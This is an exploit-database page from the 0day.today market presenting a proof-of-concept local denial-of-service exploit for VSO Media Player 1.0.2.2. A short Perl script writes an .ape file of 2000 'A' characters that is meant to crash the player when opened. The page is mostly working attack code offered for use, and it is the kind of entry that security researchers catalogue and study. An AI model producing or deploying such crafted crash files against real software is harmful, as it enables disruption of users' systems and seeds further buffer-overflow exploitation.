[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc

Author
sarbot511
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9824
Category
dos / poc
Date add
02-01-2010
Platform
unsorted
=============================================================
VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc
=============================================================

# Title: VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc
# CVE-ID: ()
# OSVDB-ID: ()
# Author: SarBoT511
# Published: 2010-01-02
# Verified: yes

view source
print?
#!usr/bin/perl
#Exploits title :[VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[www.vso-software.fr]
#tested on :[win xp sp2]
#VSO Medoa Player Version 1.0.2.2
 
 
$file="SarBoT511.ape";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";



#  0day.today [2024-12-23]  #